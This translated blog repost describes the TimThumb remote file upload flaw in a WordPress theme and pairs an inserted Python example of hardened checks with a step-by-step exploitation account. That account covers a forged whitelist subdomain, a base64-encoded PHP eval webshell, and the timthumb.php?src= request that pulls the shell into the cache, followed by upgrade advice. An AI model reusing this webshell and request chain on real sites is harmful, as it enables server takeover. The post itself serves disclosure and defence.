www.2cto.com editor's note: this is not a new article, but it was not yet on this site, so it is reposted here for reference.
First of all, this vulnerability has been around for a long time. It should date back to July, but few sites have patched it, so the damage it can do is still considerable.
Not much needs to be said about what the TimThumb plug-in does: it generates thumbnails, and anyone who builds themes should be familiar with it.
However, the images TimThumb generates are automatically stored in a designated cache directory. For example, the thumbnail files generated by TimThumb in the loper1.2 theme are stored in the cache folder inside the theme directory.
Originally, TimThumb only processes files from the current domain, so a file submitted from an external site is rejected. For example, if I try to hand 1.php under the www.dd.com domain to the TimThumb plug-in under the www.cc.com domain for processing, it displays an error.
However, for the convenience of users, the TimThumb author built in a whitelist of well-known domains, such as the famous image-sharing sites Flickr and Picasa. In other words, a request whose source is a site on the whitelist is also processed by TimThumb. But TimThumb does not strictly validate the whitelisted domain names, so an attacker can forge a third-level domain such as "flickr.com.dd.com" to bypass TimThumb's filtering.
By default TimThumb also does not check the type of the submitted file, so a PHP file can be submitted directly, which is what is commonly called getshell!
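The two checks described above (a loose host whitelist that a forged third-level domain slips past, and a missing check on the content of the fetched file) are shown here side by side with hardened versions. This is an added illustration and not TimThumb's own code: the allowlist, the constructed hostnames such as flickr.com.example.test, and the magic-byte table are assumptions made for the example.

```python
from urllib.parse import urlparse

# Illustrative allowlist of "trusted" remote image hosts (assumption, not TimThumb's real list).
ALLOWED_HOSTS = ["flickr.com", "picasa.com"]


def host_allowed_loose(url: str) -> bool:
    """Loose check: accepts any host that merely *contains* an allowlisted name.

    A host like "flickr.com.example.test" contains "flickr.com" as a substring,
    so this style of check lets an attacker-controlled third-level domain through.
    """
    host = (urlparse(url).hostname or "").lower()
    return any(allowed in host for allowed in ALLOWED_HOSTS)


def host_allowed_strict(url: str) -> bool:
    """Strict check: the host must *be* an allowlisted domain or a subdomain of it.

    Matching on the registrable suffix ("." + allowed) means "farm1.flickr.com"
    passes but "flickr.com.example.test" does not, because its suffix is "example.test".
    """
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False
    host = (parsed.hostname or "").lower().rstrip(".")
    return any(host == allowed or host.endswith("." + allowed) for allowed in ALLOWED_HOSTS)


# Magic-byte prefixes for the image formats a thumbnailer would accept (constructed table).
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "image/jpeg",
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}


def sniff_image_type(data: bytes):
    """Return the MIME type implied by the file's leading bytes, or None if it is not an image.

    Checking content rather than the URL's extension is what keeps PHP source
    (or any other non-image payload) out of the cache directory.
    """
    for magic, mime in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return mime
    return None


def should_cache(url: str, data: bytes) -> bool:
    """Hardened decision: cache only if the host is genuinely allowlisted AND the bytes are an image."""
    return host_allowed_strict(url) and sniff_image_type(data) is not None


if __name__ == "__main__":
    forged = "http://flickr.com.example.test/1.php"      # constructed attacker-style host
    legit = "http://farm1.flickr.com/photo.png"          # constructed legitimate subdomain
    php_bytes = b"<?php echo 'not an image'; ?>"         # constructed non-image payload
    png_bytes = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16      # constructed PNG header
    print("loose check on forged host:", host_allowed_loose(forged))    # True  (bypassed)
    print("strict check on forged host:", host_allowed_strict(forged))  # False (blocked)
    print("strict check on legit host:", host_allowed_strict(legit))    # True
    print("cache forged php:", should_cache(forged, php_bytes))         # False
    print("cache legit png:", should_cache(legit, png_bytes))           # True
```

The strict host check alone would already block the forged third-level domain; the content sniff is a second, independent layer so that even a genuinely allowlisted host serving the wrong kind of file does not end up writing non-image bytes into a web-accessible cache folder.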
The affected TimThumb versions are 1.14 through 1.32. From the error message above we can also see that the TimThumb shipped in LOPER1.2 is version 1.19, so the vulnerability exists there!
So for the domestic WordPress circle, the greatest damage is to sites using the loper1.2 theme, and to the shrimp's earlier wood-grain theme.
Because I had never paid attention to this vulnerability before, I did not do even a simple test until I ran into it the day before yesterday, and I found that it is not difficult to exploit. I will gloss over the specific exploitation details here. First, create a third-level domain like flickr.com.site.com; rices.so is used for the demonstration. As for how to set up the DNS records, you can simply use dnspod or dnsever ~~
Then find some hosting space, bind the domain name to it, and upload the PHP file you want to getshell with into the directory. Here I will briefly mention one thing.
There is a big misunderstanding about the method described online: it is said that the hosting space holding the PHP file must not parse PHP, i.e. accessing the PHP file must directly trigger a download, before the attack can succeed. In fact, you don't have to worry about that. Because what TimThumb reads is the output of the executed PHP code, we can simply echo the one-line shell. The code is as follows:
<?php echo base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4="); ?>
After execution, this outputs the one-liner:
<?php @eval($_POST['cmd']); ?>
Using LOPER1.2's TimThumb as an example, access "wp-content/themes/loper1.2/timthumb.php?src=http://flickr.com.rices.so/1.php" in a browser.
Although the message "Invalid src mime type" is shown, the one-line PHP shell has already been downloaded into the cache folder.
Of course, in practice we cannot directly see the filename of the downloaded PHP file, but it is very easy to work out: the file name is the MD5 value of the file's URL. For example, the file address here is http://flickr.com.rices.so/1.php,
and I have already drawn a clear picture of this, so I will not repeat it here. Note that the naming rule for TimThumb 2.0 and later versions is different, but that is not covered in this article, since the affected versions are only 1.14 through 1.32!
From this we can also see that exploitation is not difficult and the damage is very great. Therefore, as a fix, please upgrade to loper1.3; those of you still on 1.2 had best download it and overwrite 1.2.
From Rice's Blog